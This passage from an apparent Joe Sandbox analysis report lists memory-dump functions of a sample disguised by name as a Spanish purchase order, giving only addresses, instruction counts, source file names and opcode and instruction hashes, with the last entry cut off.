Opcode Fuzzy Hash: 0583884d77526ecc325db4f181f89619eca69e4e2518e190185c00c19973221d
Instruction Fuzzy Hash: FA5156B1600116DFDB55DF24D898BA9B7B2BF8A714F14816AE406DB2A1CB30EC46DF90

Function 0214BAB0 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1532600831.0000000002140000.00000040.00000800.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2140000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4179d0a14b2fd95be6ab00646bdbd5f96d1d50897c589583a762a464ca507f90
Instruction ID: 8392ffb6947fce786722665425f04a4a0222d04b3328dea663b01ffb2ea9d9d4
Opcode Fuzzy Hash: 4179d0a14b2fd95be6ab00646bdbd5f96d1d50897c589583a762a464ca507f90
Instruction Fuzzy Hash: 6641A071A48219DFDB25DF64C944BAE7BF2FF88318F014519E8099B284DF79DA01CB91

Function 0752CF80 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1545045611.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5415519c042f89b49fa75f498077091fb268a444ffb79e3ca8e32c6874d6948
Instruction ID: d74f573172d993e1bbb9c825cd44943cc4ef19623111f96607792e61237bf811
Opcode Fuzzy Hash: b5415519c042f89b49fa75f498077091fb268a444ffb79e3ca8e32c6874d6948
Instruction Fuzzy Hash: 5B51F2B4700215CFDB14DB68C588A99BBF1BF4A714B2585A9E406AB3B1DB31EC42CB50

Function 02146740 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1532600831.0000000002140000.00000040.00000800.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2140000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 778f5b9d5a83d214f8752aa426da647b24370a23696a5d4b4ca6d2e6e7988360
Instruction ID: 6e1420328a7f9c760ac79f4e3e2ad9d795780ce8dd7364ba94bccfa9e5b53abb
Opcode Fuzzy Hash: 778f5b9d5a83d214f8752aa426da647b24370a23696a5d4b4ca6d2e6e7988360
Instruction Fuzzy Hash: D041A434A44285CFDB088FA9D444FAE77B9EB89309F11846AE51EAB252DF35EC40CB51

Function 0752BA4A Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1545045611.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d769115f04d6ff51479d5b69ac8872685b090018aba4f7a9b289f3b9c19e040
Instruction ID: 6eac7f5144b9ff84fbce832dd4bb2f50faab7f67b7834118d4cbc7574ee850a1
Opcode Fuzzy Hash: 6d769115f04d6ff51479d5b69ac8872685b090018aba4f7a9b289f3b9c19e040
Instruction Fuzzy Hash: D241A4F1300612CFD7259F24C894BAAB3A2BF86300F14856AD5458B3D0EF75AC47DB92

Function 0752A2B4 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1545045611.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70c9748f883ed4699da11651281ba97018a321b894ea65a873a6152192b2a6e2
Instruction ID: ff567478e272e4f285b2d7fe98edf4befa7445e5906d9fe653a95af9722a0923
Opcode Fuzzy Hash: 70c9748f883ed4699da11651281ba97018a321b894ea65a873a6152192b2a6e2
Instruction Fuzzy Hash: E34151F0700612DFD725AB24C494BAAB3A2BF86300F148969D5468B7D0EF75EC47DB92

Function 02146730 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1532600831.0000000002140000.00000040.00000800.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2140000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3be073b52f5e12475ffb40726104d9a3bef722390bb652da6ab9011363268e07
Instruction ID: 3b758e726538bf9314834b3ed0f3d670e6dfe5b76ebf8b79accd3198b848cf26
Opcode Fuzzy Hash: 3be073b52f5e12475ffb40726104d9a3bef722390bb652da6ab9011363268e07
Instruction Fuzzy Hash: CB41C134A44285CFDB04CFA8C484FAD77B5EF4A309F1585AAE51EAB262DB35EC40CB51

Function 0752A698 Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1545045611.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4996ee5df72dabaf92115f52596097f308a0c647b77fb5ef62bf84fc9acbda48
Instruction ID: e4443086ef740dea368a8b2ab17bb212d64a6c8d8c51735193243cd4f715b2f8
Opcode Fuzzy Hash: 4996ee5df72dabaf92115f52596097f308a0c647b77fb5ef62bf84fc9acbda48
Instruction Fuzzy Hash: 9C41AE707007118FC719EB78C85066E77A2BFCA244B24896DD5069B3D1DF3AEC06CB62

Function 06B71739 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1544664755.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b70000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19a2b37ee194fe2ff6018544aff266144d8ef89d1dc65c9fb6be6d3350dc90a6
Instruction ID: a3d7a223cc379e66b83296b0fe7fe268b37da5165106654996a1409d0c89685f
Opcode Fuzzy Hash: 19a2b37ee194fe2ff6018544aff266144d8ef89d1dc65c9fb6be6d3350dc90a6
Instruction Fuzzy Hash: 21415A71D10709DBDB14DFA9C84469DBBB1FF88310F18C669E819BB264EB70A985CB90

Function 06B71129 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1544664755.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b70000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f8a0f026f71ec1b2e9415b38d3f61093bec53c35c2caafba389c316b5e6fae9
Instruction ID: 0cef47a54ac4f3db20d1e5e31d51143fd0359623f290ebdfde37a6ced1596a1c
Opcode Fuzzy Hash: 9f8a0f026f71ec1b2e9415b38d3f61093bec53c35c2caafba389c316b5e6fae9
Instruction Fuzzy Hash: 764169B1D143099FDB10DFA9D844AEEBBF4FB88300F14886AD815B7650DB786904CBA1

Function 02149DA8 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1532600831.0000000002140000.00000040.00000800.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2140000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5081be63f7acf3295f6e013a1aa04ad3c6fd1a7a9a7f3d425980511d4df3b27f
Instruction ID: 777db78ad5e4b2c5621fc64154e8475d1c5f2d878a8e6114ccf483e4a0814609
Opcode Fuzzy Hash: 5081be63f7acf3295f6e013a1aa04ad3c6fd1a7a9a7f3d425980511d4df3b27f
Instruction Fuzzy Hash: 274139746401159FCB18DF68D948AAE7BB5FF88311F210069E91ADB3B0CB35DD81CB91

Function 075298CF Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1545045611.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ad60a4c1cd9927f0f9a3d41776296ac0969f31acb9c46a6eeb706318a824c38
Instruction ID: ef935e3c1551904bdecd5cd48541d9d08afcb7f8c25837821c7ed4dfae5c5d26
Opcode Fuzzy Hash: 6ad60a4c1cd9927f0f9a3d41776296ac0969f31acb9c46a6eeb706318a824c38
Instruction Fuzzy Hash: F731EEB16043118FEB269E34D8446AA77A9FF87221F24456ED445AB391DF34E803D751

Function 0752E1A0 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1545045611.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed0a851f4e83983177f5c930fc793d0bf650f36bba7f7d2c2d68d29bcae16141
Instruction ID: 15409f6cf1fa9315cb50b4f8daa5e67df254721c65ef298258ee3c1c7d8473c9
Opcode Fuzzy Hash: ed0a851f4e83983177f5c930fc793d0bf650f36bba7f7d2c2d68d29bcae16141
Instruction Fuzzy Hash: 3A316DB13006219FCB15AB38D45866D77E6FF8A211B14466EE05ACB391DF38EC03CB92

Function 06B72F6F Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1544664755.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b70000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: acff758bf026bb531bee0df86cc4fff5bedc5569a11c37edb92bf48441f758d1
Instruction ID: 240d5d8ccdd681941b17ad7445520d31075a0453e620f0ed9158a9b6f04f06ea
Opcode Fuzzy Hash: acff758bf026bb531bee0df86cc4fff5bedc5569a11c37edb92bf48441f758d1
Instruction Fuzzy Hash: 3E31C4707041558FD708BBBCE858A3E7FF7AF89710B41445AE049DB351CE349C0993A2

Function 0752E1B0 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1545045611.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b12ba77badf7247a0b017dbf03119c0f596261cd97fd84d485bf2110e6ea7393
Instruction ID: 515e5faf1b63500edba522bfe1b7231d3f5c82c3a3d1de6322f79fbabfec5eef
Opcode Fuzzy Hash: b12ba77badf7247a0b017dbf03119c0f596261cd97fd84d485bf2110e6ea7393
Instruction Fuzzy Hash: F3316DB0300A259FCB15AB38D45866E77E6FF8A611B14466DE01AC7391DF38EC03DB92

Function 0752B714 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1545045611.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c97926de2003cf4b4cff5bbd9ba9f220ddcd5374b036e6c0af173b6e2e26b344
Instruction ID: 3a81970683373a51783447d59200592f783f11eaee38dc9458084ee387f55ab1
Opcode Fuzzy Hash: c97926de2003cf4b4cff5bbd9ba9f220ddcd5374b036e6c0af173b6e2e26b344
Instruction Fuzzy Hash: 87310FB43106118FDB14DB39C444BAA73E5BF8A714F25846AE456CB3A2EF31EC42DB61

Function 07520006 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1545045611.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16333f91d304f37ec88d10f62052710821bc5ed39292ab5a0673dd41f7b4460f
Instruction ID: 62dd5acb3e3569f954aa3ff8ab6a0712739c9df3b94256e7cefff84d6cfc5254
Opcode Fuzzy Hash: 16333f91d304f37ec88d10f62052710821bc5ed39292ab5a0673dd41f7b4460f
Instruction Fuzzy Hash: 6A319A347056418FC706DB28D8948A97FB5AF8A61470541DAE402CB3B2CB35AD06CB90

Function 0752C8D2 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1545045611.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b06df13844e565de9eefd8c1416e136367e7ec2d5ccebf38afdae8c6a393f3b4
Instruction ID: 457fba275cd600722350a3b070034f0cc95de15ece3f51f802293c76faac76a2
Opcode Fuzzy Hash: b06df13844e565de9eefd8c1416e136367e7ec2d5ccebf38afdae8c6a393f3b4
Instruction Fuzzy Hash: D93130B13106118FDB14DB29C444FAA77E5BF8A614F2584AAE455CB3B2EB31FC42DB60

Function 02146D68 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1532600831.0000000002140000.00000040.00000800.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2140000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e31fe87775da4aa1158c226200861dc4fd4e01115976d9963bb0cfa916b6a5ac
Instruction ID: 990804c9ac0e0aa05f4d6948cb07c4eea5ea638dd6a514dabdc2f8130e1b5f78
Opcode Fuzzy Hash: e31fe87775da4aa1158c226200861dc4fd4e01115976d9963bb0cfa916b6a5ac
Instruction Fuzzy Hash: 53318D34704149EFDB05AF58D944A7E7BA6FB88314F008028F90997354CF3ADD56EB90

Function 06B72F88 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1544664755.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b70000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8a8c6ae4f1c1a30c699a270da89c775fd1390ec4aa48d7b39e6016043e91b18
Instruction ID: 74971633a6ddbf6c28c56c5960d7ece785990b8270cd81ebcad0c60dcb0c70db
Opcode Fuzzy Hash: c8a8c6ae4f1c1a30c699a270da89c775fd1390ec4aa48d7b39e6016043e91b18
Instruction Fuzzy Hash: 29219E707001148FD708BBBDE898A3E7BFBBB89B00B504869E409D7394DF359C0993A2

Function 07521BD0 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1545045611.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6137df3450e24c9128043bcf5c08e69b4dadec5ed123fdafd36590ebeda2aef0
Instruction ID: 416b102258e4e33b07341f4cbfaa8218ab9b281265281450f454c33c116ce44d
Opcode Fuzzy Hash: 6137df3450e24c9128043bcf5c08e69b4dadec5ed123fdafd36590ebeda2aef0
Instruction Fuzzy Hash: 9831F5B57007199FDB01DF69D840AEFBBB5FF8A210B04846AE914D72A0DB30DD02DBA0

Function 0214BAA3 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1532600831.0000000002140000.00000040.00000800.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2140000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb33bd9c6794dbbc2871e56e394e4356863c3a9996c2228e5602017e6370e0e1
Instruction ID: 8f471c4856d82a8f20b8c75a189c0e3becc3d266d30015a99fe009acbc9d8732
Opcode Fuzzy Hash: eb33bd9c6794dbbc2871e56e394e4356863c3a9996c2228e5602017e6370e0e1
Instruction Fuzzy Hash: BF2126B26481489FCB16CF54DCC4BEA7FE5EF89364B198156F8588B145C730CA03CB91

Function 06B7BB90 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1544664755.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b70000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c53c277cee913dde17470ca800295f10ab9198055124f045fe42f0560fa11ece
Instruction ID: 134a62379fd894a5f8c624ff76eff8df1614be598fb6fd46590c6b775bd809c0
Opcode Fuzzy Hash: c53c277cee913dde17470ca800295f10ab9198055124f045fe42f0560fa11ece
Instruction Fuzzy Hash: 7231BF70604244CFE314BBBDE458A2D3FB6FF85705F4584AAE44987294CF39A80AEB21

Function 0214A1D8 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1532600831.0000000002140000.00000040.00000800.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2140000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 921c14d98bcef6fa4abda71572ced5afeccdbe6423cc9840d2bc022baa365868
Instruction ID: 627e89c608e7ce225fa6b9e275c7577dc518118cbc1ef660f9ca896df10386c5
Opcode Fuzzy Hash: 921c14d98bcef6fa4abda71572ced5afeccdbe6423cc9840d2bc022baa365868
Instruction Fuzzy Hash: 3A21A13038420187EB2516A98574B3E338BEFC4614F2A8439D80ADB394EF2BCC42B740

Function 0214A1C8 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1532600831.0000000002140000.00000040.00000800.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2140000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d9b208455787629b9c44f295b6e46ca6311a4f2fd52282c2be5fab5e49e53bd
Instruction ID: 6bd8b9a1cc155f9692ef9f657415467f339c4315edffbd4814e4f483a1ea28de
Opcode Fuzzy Hash: 3d9b208455787629b9c44f295b6e46ca6311a4f2fd52282c2be5fab5e49e53bd
Instruction Fuzzy Hash: 0121C1303842018BDB252BA98474A3D379BEFD4610B2A4039D90ADB394EF2ACC42B780

Function 0752A68A Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1545045611.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d031dd525287418e66956e72c9c2e0df20420ec563c9bba095b7e80f309d1dda
Instruction ID: 37f89c0aeb0befd26a533f0fa51083b293de5ce52293c84dd72dfc1d4373c5b0
Opcode Fuzzy Hash: d031dd525287418e66956e72c9c2e0df20420ec563c9bba095b7e80f309d1dda
Instruction Fuzzy Hash: B7318FB0700711CFC728EF79D88099AB7B6FFCA614B10856DD8159B3A1DB36E806DB61

Function 0752D5C0 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1545045611.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 385661e2012a566a6de39ce983826f7605a648ea634df216e635ba14745f51df
Instruction ID: 67223d977e42415038393ede04ed5e008c913c3572d24ff4b6f9e2a190ac7762
Opcode Fuzzy Hash: 385661e2012a566a6de39ce983826f7605a648ea634df216e635ba14745f51df
Instruction Fuzzy Hash: FA21C8F07007668BAB15663494582BE33F7BFC6151715406ADA0AC73D0EF28EC43A7AA

Function 07521C68 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1545045611.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2545daf71157d816892ff1cf22a1c91797d97c3779120dc015370b7d4566f995
Instruction ID: 361acb9ef1530d0178a61ead6b62cb9b2062df4ad5901ef58803addf2fd0fce9
Opcode Fuzzy Hash: 2545daf71157d816892ff1cf22a1c91797d97c3779120dc015370b7d4566f995
Instruction Fuzzy Hash: D421E2B2A00619AFDF01CF64DC40AEFBBB9FF89710F004066E910EB290DB349912CB91

Function 075297E8 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1545045611.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba40fac2a4b3fc84b62fcc626292a179a735262f0ea2dd6ed614023ec114e04c
Instruction ID: cbe2b3eb7b5ef9a6bbea4217f542e0598adcd8215b271ee96e09b5c24b84fde2
Opcode Fuzzy Hash: ba40fac2a4b3fc84b62fcc626292a179a735262f0ea2dd6ed614023ec114e04c
Instruction Fuzzy Hash: 462191B07012118FFB149B35C454A6A77E5FF8A610B5981AAD906DB3E0DF31EC039762

Function 0752113F Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1545045611.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76a36c0c2d1e84084db5a7c15e90d0b508dba2762f226f251f1da8c21d395fe9
Instruction ID: 1477a4ff021c7d490533ecf716fdc31bf1c2ce64c32f413dbe213ee719b9ed44
Opcode Fuzzy Hash: 76a36c0c2d1e84084db5a7c15e90d0b508dba2762f226f251f1da8c21d395fe9
Instruction Fuzzy Hash: B6312232D14B09DFCB01AFB8C854899FBB0FF95310B11CA9AE5596B121EB30E695CB81

Function 0752D285 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1545045611.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b2cdac6000af80393626e7e4c2937ebbc933902abf92a20e5337225ff4dfbe6
Instruction ID: 30a9ee8076f62a423b15eac4850d470e347f2641a54d756aa45069df3da766ad
Opcode Fuzzy Hash: 0b2cdac6000af80393626e7e4c2937ebbc933902abf92a20e5337225ff4dfbe6
Instruction Fuzzy Hash: 6D3116B5700219CFDB14DB64C484AED77F2FF8A311F1444A9E806AB290DB36ED46DB61

Function 0752CA70 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1545045611.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55be6bbe9f33eef032e831d9deeca9df7f5b4cf9d3809b8790b77a94a82c832e
Instruction ID: a9b6896ebef67323f5a5a6c941b94c77e03a2c52d2ff23bcbf642b364a296ed0
Opcode Fuzzy Hash: 55be6bbe9f33eef032e831d9deeca9df7f5b4cf9d3809b8790b77a94a82c832e
Instruction Fuzzy Hash: 79314B702007118FD755DB28C858BAA77E6FF85311F4585AAE14ECB3A2CF71AC46CB90

Function 0752D5B0 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1545045611.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: baa3e008d823a56d9349c2fcbd0273c7fa20c760b74525e105cee5b5b011e382
Instruction ID: c37830aeff0c423bfa366e9f905eb33004edac3e75e81c6363a771b6afecdb99
Opcode Fuzzy Hash: baa3e008d823a56d9349c2fcbd0273c7fa20c760b74525e105cee5b5b011e382
Instruction Fuzzy Hash: E021E7B03047A58F9B05673494581BE37B7EFC7151709016AD90AC73D0DE28DD03D7A6

Function 075297DA Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1545045611.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58d291f8f184f08a8131f8b12a315b5d6d84aaaa494a61f9770215337a7c94a7
Instruction ID: 53da083d553bceef55109dded86fd7560540ba320a8c0ae92e7e39197fde0278
Opcode Fuzzy Hash: 58d291f8f184f08a8131f8b12a315b5d6d84aaaa494a61f9770215337a7c94a7
Instruction Fuzzy Hash: 8E218EB17012228FEB159B35C858AAA77E5FF87610B4981AED405DB3E1DF34E803D752

Function 0752B75C Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1545045611.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f3745e85b259b0d4ba9028150b13498dc3f71b4916f44dc50c25b6d7ff4f7c5
Instruction ID: 49b7d4283b8f1b2d3f0ce372a36bb5ce06388c4ef0e44078a2cedb596c4f77dc
Opcode Fuzzy Hash: 6f3745e85b259b0d4ba9028150b13498dc3f71b4916f44dc50c25b6d7ff4f7c5
